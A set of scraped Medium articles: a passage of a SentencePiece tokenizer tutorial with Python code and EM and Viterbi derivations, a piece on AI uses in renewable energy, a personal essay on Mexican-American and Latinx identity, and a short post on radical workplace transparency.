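    space-separated subwords ending in the '_' end-of-word token."""

    def __init__(self, corpus, n_merges=10):
        self.corpus = corpus
        self.n_merges = n_merges
        self.vocab = {}     # "h e l l o _" -> word count
        self.tokens = set() # current subword inventory
        self.merges = []    # ordered list of (bigram, merged) operations

    def initialize_vocab(self):
        words = Counter(self.corpus.lower().split())
        for word, count in words.items():
            self.vocab[" ".join(word) + " _"] = count
            self.tokens.update(word)
        self.tokens.add("_")

    def get_bigrams(self):
        bigrams = Counter()
        for word, count in self.vocab.items():
            symbols = word.split()
            for i in range(len(symbols) - 1):
                bigrams[(symbols[i], symbols[i + 1])] += count
        return bigrams

    def merge_vocab(self, bigram):
        # Replace every whitespace-delimited occurrence of the bigram pair
        pattern = re.compile(r"(?<!\S)" + re.escape(" ".join(bigram)) + r"(?!\S)")
        merged = "".join(bigram)
        # Note: assumes merging never collides two distinct vocab keys
        self.vocab = {pattern.sub(merged, w): c for w, c in self.vocab.items()}
        self.tokens.add(merged)
        self.merges.append((bigram, merged))

    def fit(self):
        self.initialize_vocab()
        for _ in range(self.n_merges):
            bigrams = self.get_bigrams()
            if not bigrams:
                break
            self.merge_vocab(bigrams.most_common(1)[0][0])

bpe = BPE("low low low lower lower newest newest newest newest", n_merges=5)
bpe.fit()
```

On this toy corpus the first merge is ("w", "e") → "we" (it appears 6 times across "lower" and "newest"), followed by "lo", illustrating how the most frequent pair always wins.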
How to train SentencePiece
Great! Now that we have our byte-pair encoder ready to manufacture subwords on the spot, we can turn to training SentencePiece. We assume that we have a large collection of bigrams, greater than whatever desired vocab size we ultimately want. To train, we want to maximize the log-probability of obtaining a particular tokenization X=(x_1, …, x_n) of the corpus, given the unigram probabilities p(x_1),…,p(x_n). Since only the full un-tokenized sequence X is observed, the actual tokenization (x_1, …, x_n) is unobserved. This is a classic setup for using the EM algorithm [10].
So it should be easy, right? Just turn to any old ML textbook and copy/paste the EM result. Well… no. The problem is that the x_i are all of different sizes!
It turns out that the code implementation of sentence piece uses a Bayesian method of training, whereas the paper description uses a maximum likelihood EM method. If this is confusing, just know generally Bayesian=harder. To see what I’m talking about you either have to really dig into the C++ code, or just look where I tell you in references [11] and [12].
Since this point will come up, we need to show how to solve the basic Bayesian EM problem for Dirichlet processes. As it is a little off the main topic, please see Appendix I for details. For now, we’ll keep moving along.
The SentencePiece training objective is the following. We wish to maximize the log-likelihood
L(θ) = Σ_{s=1}^{|D|} log P(X^{(s)}) = Σ_{s=1}^{|D|} log ( Σ_{x ∈ S(X^{(s)})} P(x) )
Where the x are the unigram sequences, and S(x) denotes the set of all possible sequences. Again, these are hidden variables, we only see the un-tokenized corpus! To solve this, we incorporate an EM type algorithm. If you’re familiar with EM, you’ll notice the steps are actually backwards, we do an ME-method. Despite the fancy name, it’s actually quite intuitive and straightforward. The steps are:
1. Initialize the unigram probabilities. Remember P(x) = p(x_1)…p(x_n), so once we have the unigrams, we have the probability of any sequence. In our code, we just use the BPE frequency counts to get closer to the objective.
2. M-step: compute the most probable unigram sequence given the current probabilities. This defines a single tokenization. Implementing this requires some thought.
3. E-step: given the current tokenization, recompute the unigram probabilities by counting the occurrence of all subwords in the tokenization. The frequentist unigram probability is just the frequency with which that unigram occurs. In practice, it is no more difficult to Bayesian-ify this (see the Appendix) and instead compute

p(x_i) = c_i / M → exp(ψ(c_i)) / exp(ψ(M))
Here, c_i is the count of subword (unigram) i in the current tokenization. M is the total number of subwords. Psi is the digamma function. The arrow indicates how we Bayesian-ify.
4. Repeat steps 2 and 3 until convergence. The log-likelihood is theoretically guaranteed to monotonically increase, so if it doesn’t you’ve got a bug.
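The E-step on its own is just counting. Below is a sketch of the frequentist version; the Bayesian variant would replace each ratio c_i / M with exp(ψ(c_i)) / exp(ψ(M)) using scipy's digamma (the sample tokenization is made up):

```python
from collections import Counter

def e_step(tokenization):
    """Re-estimate unigram probabilities from the current tokenization's counts."""
    counts = Counter(tokenization)
    total = sum(counts.values())  # M, the total number of subwords
    return {tok: c / total for tok, c in counts.items()}

# Hypothetical current tokenization of a tiny corpus
probs = e_step(["he", "ll", "o", "he", "y"])
```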
We’re almost there, the final piece we need is how to compute step 2.
Finding the optimal tokenization
If all of the subwords were of the same length, this would be a classic application of the Viterbi algorithm [13]. But alas, life is not so simple. The Viterbi algorithm applies to the following problem
You have some hidden states z_1, …, z_n, and you want to transition from z_1 →z_2 →… →z_n, and you know the transition matrix A_ij, giving the probability to go from z_i^{(1)} → z_j^{(2)}, where i and j are the hidden state dimension, and the superscript is the sequence order. All transitions get the same A matrix. You can use Viterbi to construct an optimal path
The issue is that A is not between adjacent states. To understand how this may be a problem, let us represent a simple tokenization procedure diagrammatically.
Consider tokenizing the word “hello”. Let’s say we have the subwords:
{“he”, “h”, “ll”, “e”, “o”, “hell”}.
Then, we can generate the following “trellis-like” figure (it’s not a trellis since we don’t show transitions to all possible hidden states i.e. characters, and transitions are not restricted to nearest neighbors, we can jump more than one box to the right.):
Source: current author. Dashed lines delineate fundamental character/byte spacing. Arrows indicate which words are reachable via allowed tokens. Each column represents a hidden state z_i^{(j)}. i has dimension given by the number of fundamental characters, the superscript indicates sequence order.
Each arrow represents a transition, and we can think of it as carrying a probability as well, given by the unigram probability of the token created from the arrow’s tail (not inclusive) to its head (inclusive). The goal is to now pick arrows such that we arrive at <eos> — end of sequence — with as high a probability as possible.
This problem has optimal substructure and can be solved with dynamic programming. Let’s say we are sitting at state (4). There are three arrows feeding into it, a red, a blue, and a green. The max probability at (4) is just the best path out of the three possible choices: coming from red, from blue, or from green. In equations:
p_max(4) = max over the three incoming arrows of [ p_max(arrow tail) · p(arrow's subword) ]; in general, p_max(j) = max_{i<j} [ p_max(i) · p(x_{i→j}) ], where x_{i→j} is the subword formed by the arrow from state i to state j.
We’re almost ready to code it up, but there’s one issue. How do we actually find those arrows we drew? And how do we do it efficiently? For this, we need to make use of the Trie data structure [14]. It’s bit a bit difficult to explain in words (pun intended!) so let’s just show what the trie looks like for our current problem:
Source: current author. This is the Trie corresponding to the subword dictionary {‘h’, ’he’, ’hell’, ’hello’}. There are additional nodes <sos>-e-<end> and likewise for ‘o’, and ‘l’ as well that we have omitted for clarity.
The root node is the start-of-sequence token <sos>. Any time we encounter and <end> node, it signifies that everything in the path from <sos> to <end> is a valid subword. The root <sos> will begin with exactly one branch for every unique character in our subword list. As we grow the available subwords, we create more branches in our trie. The Trie is going to be the fundamental data structure that our tokenizer uses to store and retrieve subwords.
Here’s a basic Trie implementation in python that will fit all of our needs:
We’ve now got everything we need. The actual algorithm for computing sequences can vary depending on if we want just the best sequence (Viterbi) or the n_best, so we will keep two separate functions for this. The dynamic programming solution to this type of problem is old and so it has other names; it is referred to as a forwards-backwards algorithm, and is a special subset of the sum-product algorithm for training directed graphical models [13, pg. 613]. More sophisticated algorithms include the Forward-DP Backward-A* algorithm [15] and Forward-Filtering and Backward-Sampling algorithm (FFBS) [16]. Our solution will be closer to the latter.
There’s one final note before showing the code. When performing the max over p_{i<j}, we brute force search p_{T<i<j}, where T is the length of the longest subword. That’s probably going to be a small number and shouldn’t harm our O(N) algorithm.
Ok, below is our full sentencepiece trainer. For the moment, you only need to pay attention to the methods 1) forward_step 2) backward_step
The forward and backward steps implement the algorithm we just talked about. The backward step hasn’t been discussed yet though. While we compute the forward step, we also store the length of the max token ending at any given index. This way, we can retrace all of the arrows that led to our max probability, since the length of the arrow fully specifies the transition! This is because the tokenized text isn’t changing, meaning the hidden states are set. We really are just choosing how many steps to jump at every character.
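To make the forward/backward idea concrete, here is a simplified sketch that searches a plain dict of log-probabilities instead of the trie, storing the winning token length at each index exactly as described (function and variable names are mine, and the unigram probabilities are made up):

```python
import math

def viterbi_segment(text, logp):
    """Forward pass: best[j] = max over i < j of best[i] + logp[text[i:j]].
    Backward pass: retrace the stored winning token lengths."""
    n = len(text)
    best = [-math.inf] * (n + 1)
    best[0] = 0.0
    back = [0] * (n + 1)            # length of the best token ending at index j
    max_len = max(map(len, logp))   # T: the longest subword bounds the inner search
    for j in range(1, n + 1):
        for i in range(max(0, j - max_len), j):
            piece = text[i:j]
            if piece in logp and best[i] + logp[piece] > best[j]:
                best[j] = best[i] + logp[piece]
                back[j] = j - i
    if best[n] == -math.inf:        # no segmentation covers the whole text
        return None, best[n]
    tokens, j = [], n
    while j > 0:
        tokens.append(text[j - back[j]:j])
        j -= back[j]
    return tokens[::-1], best[n]

# Hypothetical unigram log-probabilities
logp = {t: math.log(p) for t, p in
        {"h": 0.05, "e": 0.05, "l": 0.05, "o": 0.05,
         "he": 0.1, "ll": 0.1, "hell": 0.2}.items()}
tokens, score = viterbi_segment("hello", logp)
```

With these numbers, "hell" + "o" (probability 0.2 × 0.05) beats "he" + "ll" + "o" (0.1 × 0.1 × 0.05), so the optimal tokenization is ["hell", "o"].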
The full EM step is easy to put together now. We follow the steps outlined earlier, and use the Bayesian-ified EM step, which is why we had to import the digamma function from scipy.
There’s one more piece (pun intended again) to make this complete. In general, we want to be able to fix our vocab size. What sentencepiece does is first aggregate more subword tokens than it really needs. We then perform pruning “rounds” whereby we optimize the EM algorithm, then remove or prune off the least probable 20% tokens (probabilities were computed in the E-step). We repeat this procedure until we reach our desired vocab size.
The fit method now takes care of running the EM steps, pruning after each round, then continuing if further reductions are needed. And that’s the trainer.
Subword sampling
The final part is subword sampling. Disclaimer, we don’t use the same algorithm, but it’s enough to generate randomized tokenizations and provide a proof of concept.
In the forward-backward pass, we only stored the optimal sequence. To find alternative tokenizations, at each index instead of saving only the optimal ending subword, we save the n_best number of ending subwords. Now, we can tokenize by randomly sampling each final subword from the provided list. This gives us subword regularization!
Why the disclaimer? Well, if you think about it, we actually still have the same problem as before, where randomly sampling ending subwords locally does not guarantee that the full tokenization will be 2nd, 3rd, 4th, or whatever best. To properly do that, please see the actual sentencepiece implementation [2] or the FFBS algorithm [16].
The random sampler is provided by the generalized_forward_step and generalized_backward_step methods. Here’s an example output:
Sample 1: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'or', 'l', 'd']
Sample 2: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'o', 'r', 'l', 'd']
Sample 3: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'or', 'l', 'd']
Conclusion
This was a long dive into SentencePiece, but I hope it has been worth the effort. Now that you know more about how it works, you can promptly forget everything and just piece together what you need from the bullet points at the top of the article (pun still intended!!):
Speed speed speed. Can directly handle text data during training.
Subword regularization → better models, data augmentation, improved Language Modeling pretraining
Can easily tokenize non-whitespace languages like Japanese and Chinese
No more [UNK] tokens (well…almost no more [UNK] tokens)
If you have any NLP tasks, please strongly consider using SentencePiece as your tokenizer. For using the actual software, I’ve found the following Google Colab tutorial to be really useful [18].
Thanks, and happy tokenizing!
Appendix
Here, we discuss how to Bayesian-ify your EM algorithm. You can also read along with Reference [12].
The discussion is based on mean field theory. We will simply use its main result, i.e. the coupled equations for determining posterior distributions over hidden parameters/states. See Chapter 10 of [13] for further reading.
The goal of variational inference is to determine the posterior distributions of our model’s unobserved parameters and/or states. We begin by writing the model’s log evidence:
Which is a repeat of our earlier definition; nothing new yet. Recall, X is the un-tokenized corpus, S(x) represents all possible sequences, and the boldface lowercase x denotes a particular tokenization. Due to the summation inside the log, this model is intractable. To make headway, we first introduce hidden variables pi, denoting the unigram probabilities. We further condition these probabilities on a Dirichlet prior, creating a Bayesian model. We write:
The probability p(pi|alpha) is a symmetric Dirichlet distribution:
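The equation referenced here was rendered as an image in the original post; the standard symmetric Dirichlet density it describes, with the single concentration parameter alpha shared across all K vocabulary entries, is presumably:

```latex
p(\pi \mid \alpha) \;=\; \frac{\Gamma(K\alpha)}{\Gamma(\alpha)^{K}} \prod_{k=1}^{K} \pi_k^{\alpha - 1}
```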
and the probability of any particular sequence is the product of its unigram probabilities
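This equation was also an image in the original; using the x_{nk} indicator notation that the text defines next, the product over unigram probabilities presumably takes the form:

```latex
p(\mathbf{x} \mid \pi) \;=\; \prod_{n} \prod_{k=1}^{K} \pi_k^{x_{nk}}
```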
The x_{nk} are binary-valued (can only be 0 or 1) and represent whether the nth position in the sequence is given by the kth subword in the vocabulary. We now make the mean field approximation for the posterior distribution
the subscripts are purely labels; they don’t represent dimensions or anything like that, they’re just names. From here, we can make use of the general formulae for computing posteriors:
and similarly for pi
Inserting our definitions for the log model evidence into the expectation values and pulling out all the terms not averaged over, we find the two equations
Now we make the following observation. The top equation is precisely in the form of a Dirichlet distribution, with a modified prior. Furthermore, since the z_nk are binary variables we can perform their expectation as just the count of various unigrams. We define this with the variable
which again is just the unigram count. Now that we know the distribution over pi, we can compute its expectation value using the known result [13, page 687, Eq. B.21 OR go to wikipedia — way faster]
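That known result, also an image in the original, is the standard Dirichlet expectation, where psi denotes the digamma function and c_k the unigram count:

```latex
\mathbb{E}[\ln \pi_k] \;=\; \psi(c_k + \alpha) \;-\; \psi\!\Big(\textstyle\sum_{j=1}^{K} c_j + K\alpha\Big)
```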
Putting this into the equation for log q_z(z), we find the distribution
This is exactly our categorical distribution over the weights pi! In other words, we immediately recognize that the quantity inside the parentheses is indeed our weights pi. The only thing we need to mention is that when applying the Bayesian-ified method, we set alpha=0. This has the effect of enhancing high-count unigrams and diminishing low counts.
References
[1] Kudo, Taku, and John Richardson. “Sentencepiece: A simple and language independent subword tokenizer and detokenizer for neural text processing.” arXiv preprint arXiv:1808.06226 (2018).
[2] https://github.com/google/sentencepiece/
[3] Kudo, Taku. “Subword regularization: Improving neural network translation models with multiple subword candidates.” arXiv preprint arXiv:1804.10959 (2018).
[4] Steven L Scott. 2002. “Bayesian methods for hidden markov models: Recursive computing in the 21st century.” Journal of the American Statistical Association .
[5] http://cs229.stanford.edu/notes-spring2019/cs229-notes2.pdf
[6] Kingma, Diederik P., and Max Welling. “Auto-encoding variational bayes.” arXiv preprint arXiv:1312.6114 (2013).
[7] Philip Gage. “A new algorithm for data compression.” C Users J. 12(2):23–38 (1994).
[8] Rico Sennrich, Barry Haddow, and Alexandra Birch. “Neural machine translation of rare words with subword units.” In Proc. of ACL (2016).
[9] https://huggingface.co/transformers/tokenizer_summary.html
[10] http://cs229.stanford.edu/notes-spring2019/cs229-notes8.pdf
[11] Specifically, go to Line 271 https://github.com/google/sentencepiece/blob/master/src/unigram_model_trainer.cc
[12] If you looked at [11] you will find the link, page 178 in particular: https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
[13] Bishop, Christopher M. “Pattern recognition and machine learning.” springer, (2006). Look at page 629
[14] https://en.wikipedia.org/wiki/Trie — Sorry I don’t have a better reference, I’m really not even sure how I know this anymore.
[15] Masaaki Nagata. “A stochastic japanese morphological analyzer using a forward-dp backward-a* nbest search algorithm.” In Proc. of COLING (1994).
[16] Steven L Scott. “Bayesian methods for hidden markov models: Recursive computing in the 21st century.” Journal of the American Statistical Association (2002).
[17] Bostrom, Kaj, and Greg Durrett. “Byte pair encoding is suboptimal for language model pretraining.” arXiv preprint arXiv:2004.03720 (2020).
[18] https://colab.research.google.com/github/google/sentencepiece/blob/master/python/sentencepiece_python_module_example.ipynb
[19] Murphy, Kevin P. Machine learning: a probabilistic perspective. MIT press, (2012).
Source: https://towardsdatascience.com/sentencepiece-tokenizer-demystified-d0a3aac19b15 (Jonathan Kernes, 2021-02-08). Tags: Tokenization, NLP, Editors Pick, Getting Started, Data Augmentation
Why Renewable Energy Needs AI
Renewable energy uptake is growing rapidly, making up almost half of the UK’s energy mix in Q1 2020, with the UK also going two months without coal-fired power this year. Over the past decade renewable energy has increased by 13.7% annually, making up 11% of total energy consumption in 2019.
Within the overall mix, wind power grew by 19% last year whilst solar energy grew by 22%; both grew faster than the more established hydropower.
Costs are down, appeal is up
The growth in renewable energy is partially due to rapidly decreasing costs, with the cost of solar power dropping 82% since 2010 and the cost of onshore wind down 39% in that time. Wider usage has also led to cost reductions as the technologies achieve economies of scale.
Costs for renewables are now below coal and gas and are expected to continue to fall. This has made them attractive not only from a purely economic standpoint but equally from the standpoint of investors who are less and less interested in funding new power plants unlikely to be economically viable.
Climate change: driving renewables
The increased uptake of renewables is also partially driven by the growing awareness of the impact of climate change, prompted by events like California’s record fire season with more than 4 million acres burned. The need to mitigate the growth in carbon levels makes renewable energy more attractive and government legislation to prevent further damage to the climate is likely to further drive uptake.
Average global temperature change (1880–2020)
This means that renewables are also increasingly important for the economy. Consider, for example, that the solar industry in the US now employs around 242k people and generates tens of billions of dollars in economic value, and the wind industry supports 120k jobs.
As the sector continues to make up a larger portion of the economy, a market will emerge seeking solutions to address the industry’s pain points, such as intermittency and the challenge of matching supply and demand. Many of these solutions will rely on machine learning.
The opportunities
Some of the areas I’m interested in are:
1. Predictive maintenance
2. Energy generation forecasting
3. Site identification
1. Predictive maintenance
Wind turbines move constantly. It’s pretty much the point. Things that move break down and the maintenance requirements of wind turbines are significant. Operations and maintenance is estimated at 20–25% of the total costs over the lifetime of a turbine.
Wind turbines also generate a lot of data, raising the potential to use the data to improve efficiency and drive down maintenance costs. There is a growing market for digital twin software, which builds a digital copy of a physical asset and uses it to predict performance and required maintenance with wind installations likely to be a key market going forward.
I expect increasingly sophisticated machine learning models that understand the future maintenance requirements of an asset and automatically schedule work at the optimum time.
2. Energy generation forecasting
Unlike the power generated from coal or gas, wind and solar power isn’t constant or controllable. This intermittency will be an increasing problem as their share of the total power mix increases.
In 2019, Google used AI to predict wind output 36 hours in advance, allowing the wind farm to commit to providing energy in advance and increasing the price achieved by 20% versus providing energy without committing in advance.
I anticipate AI will enable energy producers to make more accurate predictions of energy generation based on factors such as local weather, asset performance and position, allowing more efficient matching of supply and demand and increasing the value of the power generated.
3. Site selection
The final use case I expect to emerge is in identifying the best sites for renewable energy assets. Both wind turbines and solar panels rely on local conditions for power generation, meaning that a complex array of factors such as weather, land prices, grid connectivity and installation cost need to be considered when deciding where to build.
As the rate of installation increases, I expect energy companies will use specialised software to decide which sites to build on, optimising for a range of factors to find the best locations. Being able to combine multiple data sources and tailor decisions to specific use cases is likely to be a key competency for players in the space.
Working in this space? Get in touch
The growth of renewable energy offers up exciting opportunities to companies to improve the world whilst also building attractive businesses.
If you’re building something in the renewables space, I’d love to hear from you.
Source: https://medium.com/nanotrends/why-renewable-energy-needs-ai-70ce57038805 (Luke Smith, 2020-12-07). Tags: Climate Change, VC, Investment, AI
Musings About My Identity
Personal Experiences with Mexican, American, Indigenous, Latinx & Others
Photo by Author. Painting, Teotihuacan, by local artist.
Denverite, Coloradoan, American, Miguel Auzense, Zacatecano, Mexicano
My name is Jesús, but many of my friends and family call me Jesse. My pronouns are él, he, him, and his. I was born in Denver, Colorado, to parents from a small town in Zacatecas named Miguel Auza, which is approximately two hours away from the capital city of Zacatecas, Zacatecas. The name Zacatlan was given to this place by the Mexica (Me-Shi-Ca), also known as the Aztecs, and it means the place where grass, zacatl, is abundant.
From as far back as I can remember, our family spent the summer months in Miguel Auza. When I started high school, I began to spend even more time in Mexico, where I made many meaningful and long-lasting friendships with the local young people and others from across the United States whose parents were also from Miguel Auza. During this time period in my life, the following three things occurred: I learned that my Spanish was not as great as I thought it was when I was in the United States, my Spanish improved significantly, and I authentically experienced Mexican culture firsthand. Regarding the latter, I learned that it is quite different being Mexican-American in the United States and being Mexican-American in Mexico. It felt like in neither country, both of those parts of my identity could be embraced simultaneously.
Amigx
When I was in high school and visiting Miguel Auza, a co-ed group of friends socialized together but generally aligned themselves and congregated mostly by gender. In the plaza or alameda, you would see a group of young men and young women, separately but near each other. In the group of young men, I can affirm that most of the conversations consisted of helping one build up the courage to tell one of the young women that he liked her. However, in the group of mostly young women, there was always one young man who aligned himself with them named Tony. These experiences are from over twenty years ago, but I vividly remember that group of friends, which included Tony, teaching me about equis (X). They did not refer to each other as amigos or amigas but rather as amigx (amigequis). They were able to apply the nongender conforming equis, seemingly with great ease and fluency. Admittedly, it took me a while to get the hang of the rule. I remember incorrectly applying it to my own name, Jess-equis, and my friends laughed then further explained that they apply the equis to masculine and feminine specific words when in their gender-mixed groups or when referring to another gender-mixed group. When referring to themselves as a mixed-gender group, this group of friends might have identified as Miguel Auzenses, Zacatecanx, and Mexicanx. Whereas all of the young women in the group would refer to themselves individually as Miguel Auzenses, Zacatecanas, and Mexicanas, while Tony identified as Miguel Auzense, Zacatecano, and Mexicano.
They realized that referring to themselves as amigas when Tony was a part of their group feminized him in a way that did not honor his identity as a young man. They also realized that referring to themselves as amigos just because Tony was a part of their group, which is the general rule of thumb in Spanish, would masculinize them and subject them to the language's patriarchal norms. As a group of forward-thinking young people, they challenged these gendered structures and created a language that worked better for their needs. At that time, I had not met anyone who referred to themselves, in the singular, with the nongender conforming equis. My experience was limited to mixed-gender groups using equis to replace masculine or femine specific words in Spanish.
Mexican-American y Chicano
Long before I spent so much time in Miguel Auza, my parents always told me that I was México-Americano and that even though I was born in the United States, they wanted me to have dual citizenship. In the United States, however, I was proudly Mexican. When I would travel to Mexico, my friends would tell me that I was Americano. I struggled with identifying as American, even though I was because being American had been racialized for me. American meant white, and I was clearly, not white. To the Mexicanx adults in my life, I was also not Chicano because I spoke Spanish. They had met Mexican-Americans who did not speak Spanish and self-identified as Chicanos and Chicanas, and that was our context. I would later learn that Mexico's Indigenous people called themselves Mexica, and the word Chicano is a shortened form of Mexicano (Me-Shi-Ca-No). During the civil rights movement in the 1960s, leaders like Cesar Chávez, Dolores Huerta, Rodolfo “Corky” Gonzales, and others helped popularize its use with pride for being of Mexican descent while living in the United States. Not quite Mexican, not quite American, but still both.
American
I am a hip hop aficionado and have been that way for as long as I can remember. Hip hop is an important part of the American and English speaking part of my culture. My grandfather babysat me, and while at my grandparents’ home, I spent most of my time rummaging through my uncles’ collection of cassettes. This cassette rummaging is a story of its own. Still, if you have read this far, I want you to know that some of our favorites included: Public Enemy’s It Takes a Nation Of Millions To Hold Us Back, Eric B & Rakim’s Paid in Full, Boogie Down Productions’ Criminal Minded, De La Soul’s 3 Feet High & Rising, The Great Adventures of… Slick Rick, NWA’s Straight Outta Compton, LL Cool J’s Radio, RUN DMC’s Raising Hell, Gang Starr’s Mr. Nice Guy, and Big Daddy Kane’s Long Live the Kane (my dog’s namesake: Big Daddy Cain).
Hispanic
Although the former list of albums is not exhaustive, I mostly wanted to point out that I didn’t have an experience with the word Hispanic until Kid Frost, a self-identified Mexican-American emcee, famously released the song La Raza on his album, Hispanic Causing Panic. Viva La Raza was a rallying cry used by Chicanos to celebrate culture. Hispanic refers to someone who is a descendant of a Spanish speaking country. In that song, Kid Frost said, “It’s in my blood to be an Aztec warrior, go to any extreme and hold no barriers / Chicano, and I’m Brown and proud.” That song was different from the hip hop I was accustomed to, both in what it sounded like as well as in terms of content. Still, I remember being drawn to the use of Spanish in the song and the cultural references he made to being Indigenous and Brown. Before La Raza, I hadn’t heard anyone rap in English and Spanish. However, in any case, Hispanic was still not a term I was hearing anyone refer to themselves or others except when listed as an option on official documents where you were asked to identify your race and/or ethnicity. At that time, I recall that Spanish speaking stations referred to their viewers, including my parents and my family members, at large, as Hispanos.
Latino
About one year after hearing La Raza, Cypress Hill, a hip hop group that included a Cuban-American and Cuban-Mexican-American member, released their self-titled debut album, which included a song called Latin Lingo. The song was not one of my favorites in terms of what it sounded like, but it was the second bilingual example of hip hop I remember being exposed to. At that time, I also hadn’t heard of people who looked like me called Latins or Latinos, as Cypress Hill had referred to themselves. For what it’s worth, generally speaking, Cypress Hill sounded more like the hip hop I was used to than Kid Frost did. In early 1998, the world was introduced to my favorite artist, Christopher Lee Ríos, better known as Big Punisher or Big Pun, a Puerto Rican from the South Bronx, New York City, New York. In his rhymes, Big Pun embraced the term Latin, Latino, and Spanish, as well as Puerto Rican and Boricua, in a way that I hadn’t really heard before. Specifically, he wasn’t making songs about being Latino per se. Still, he let listeners know he was Latino throughout much of his music. His big break came from a hit single called Still Not A Player. The opening verse included several examples of translanguaging and Spanglish, for example: “Puffin’ the lye, from my twinzito / Up in the Benzito, with my Kiko / from Queens, nicknamed Perico.” The song closes with the now-famous outro in Spanish, “boricua, morena.” In Big Pun’s mainstream introduction, he made those cultural connections I had come to be drawn to. 
He continued to do so throughout the rest of his album, sprinkling Spanish references and Puerto Rican pride here and there like in the song Beware when he says, “Puerto Roc style” or in his song Super Lyrical making a quick reference to the son of God as, “Jesús” (hey-soose) or in Dream Shatterer when he says, “I’m the first Latin rapper to baffle your skull” and “you ain’t promised mañana in the rotten manzana.” Big Pun became my favorite emcee because of his lyrical ability. The Latino affinity was a bonus.
As a hip hop aficionado, the Latino affinity was fundamental, though—representation matters. I was so proud of Big Pun, and I felt like he represented me, even though he was of Puerto Rican descent and I am of Mexican descent. In my eyes, we were the same, and Latinos' shared identity solidified that connection at the time. At this point, I self-identified as Latino, Chicano, and Mexican interchangeably.
As I began to learn more about myself, my ancestors, and the historical experiences of those like me in the United States, I began to feel that Latino also missed the mark on who I am. Italian, French, Portuguese, Spanish, and other languages are each direct descendants of Latin. From Mexico through Central and South America and most of the surrounding islands, Latin America was dubbed this by the French to differentiate it from other parts of colonized America, particularly the north, which was largely colonized by Great Britain. So, Latino (masculine) refers to a man who is a descendant of a country where one of the Latin descendant languages is spoken, which mostly refers to Spanish because it is the official language of most countries in Latin America but, it also includes Portuguese in Brazil and French in Haiti, for example. This is an important distinction from Hispanic, which only refers to descendants of countries where Spanish is spoken.
Indigenous
Some of my ancestors came to this continent as colonizers, mostly from Spain. However, identifying as Latino or Hispanic or Spanish centers whiteness and perpetuates indigenous erasure that I do not wish to partake in or further contribute to. Most of my ancestry is indigenous to this continent and I am very proud of that. Those same colonizing ancestors from Spain planted roots in Mexico and passed their language on from generation to generation. I lament the success of indigenous erasure within my own family tree, which includes gaining a language in Spanish but losing our native language, which was indigenous to this continent, over time, for example. However, being bilingual, in Spanish and English, is an important part of my identity, especially because Spanish is the only language I can communicate with both of my living grandmothers in. It is important to note that there are many things about our indigenous culture which, fortunately, have not been erased, such as the prehispanic culinary culture that we enjoy today like mole, tamales, chilaquiles, sopa de tortilla, and pozole to name just a few. Not to mention the ingredients in our everyday foods that were enjoyed by our ancestors and are indigenous to this continent as well like avocado, chocolate, tomato, maize, and chile. I wrote all of those foods in their anglicized form but each of them is rooted in Nahuatl (the language of the Mexica). Similar to W.E.B. Du Bois’ double consciousness, I grapple with a triple consciousness, at least.
Mestizo
In addition to Mexico-Americano, my mother always told me that I was mestizo, which means mixed. I never quite understood what she meant because both of my parents are Mexican, and my skin tone is brown like the very color of the land on this continent. But when I was in high school, at the recommendation of my cousin Iván, I read Gary Jenning’s Aztec Blood through which I learned about the Spanish caste system in Mexico which included: Peninsulares, Creoles, Mestizos, Pardos, Indios, Mulattos, Zambos, and enslaved Africanos. Later, as an undergraduate, I had the opportunity to study abroad in Zacatecas and took a history class with a man named Don Arturo, who taught me more about Mexico’s history, including the mestizaje. This experience made it make more sense to me, bringing me closer to my native roots.
As a survivor of colonization, indigenous erasure, the mestizaje, and not to mention being a first-generation United States citizen, I am multiracial, multiethnic, multicultural, and multilingual; mixed, if you will. Hence, it is quite challenging for me to check a single box that represents my identity. However, I do have a preference, and in order of fondness, I identify as 1. Latino of Mexican Indigenous descent, 2. Brown, 3. Mexican, 4. Chicano, 5. Latino, 6. American, and 7. Mestizo.
Latinx
Over the last several years, Latinx, usually pronounced in English or Spanglish (Latin-ex or Lateen-ex) has been used as a gender-neutral or nonbinary alternative to Latino (masculine) and Latina (feminine), which are usually pronounced in Spanish. I fully support the use of Latinx from an inclusive perspective, and quite frankly, I have been shocked to experience queer racism (see Dr. Ibram X. Kendi’s How To Be An Antiracist) on full display from people who make concerted efforts not to use Latinx, even when someone has clarified their pronouns or in a mixed-gender space of Latinx people (Lateen-equis en español). I have heard some people say things like, “I don’t know about Latinx” or “I’m not sure how I feel about Latinx” or “I don’t identify as Latinx” or “I won’t use Latinx” while fully supporting the use of Latino and Latina, making their protests about the X and not about the Latin. In some cases, even going as far as saying that they would use Latin@, which is a way to include Latinos and Latinas, in print, at the same time but still fails to include nonbinary people.
If you are going to refer to someone or a mixed, including nonbinary, group of people as Latin-anything, or you are unsure of anyone’s pronouns, or someone has communicated to you that their pronouns are they, them, and theirs, then I strongly encourage you to refer to them as Latinx instead of Latino or Latina. By no means, am I suggesting that we should all be referred to as Latin-anything; that is for us to decide for ourselves as individuals. But, as my brother Nelson, my primo hermano Rigo, and I have discussed, our issue is not with the “X,” which is more inclusive. Our issue is with the “Latin,” which is Eurocentric and erases our Indigenous identities. I identify as Latino of Mexican Indigenous descent because it allows me to stand in solidarity with all humans who are descendants of the Latin American diaspora.
Closing With An Invitation
I wanted to share some of my own complicated journey, evolution, growth, and overall insights into my experiences through this reflection in hopes that it may inspire more conversations about the exploration of our identities, individually and collectively. ¡Hasta pronto!
Source: https://medium.com/@drjrod/musings-about-my-identity-5bd4fc4d35a2 (Dr. Jesús G. Rodríguez, 2021-08-31). Tags: Indigenous, Latin America, Mexico, America, Latinos
Radical Transparency
I am a firm believer that transparency is the best approach a company can take to improve its culture.
We are used to hearing about the “Need to know basis”. What if we change this?
What if instead we use “Cannot know basis”. Let me explain.
You will only not be able to know something if you truly cannot know about it.
For example :
Any business deals that cannot be shared before they are done.
Security information that cannot be shared with everyone.
Personal information from employees and/or customers that would invade their privacy.
We should change the paradigm. Instead of just showing the information that you need to do your job (which looks like the other stuff is being hidden away when in reality there is no point in it), we openly say what is being “hidden” and the reason why you cannot access that information.
This eliminates one of the biggest wastes we have in any organization. Office Politics. If anything that can be out in the open is out in the open, then there is no place for office politics. You cannot try to sell politics when everyone can have access to that information and see for themselves.
This quote sums it up
Sunlight is the best disinfectant
Try radical transparency.
Go for “cannot know basis” and see how your culture improves over time.
Till next time …
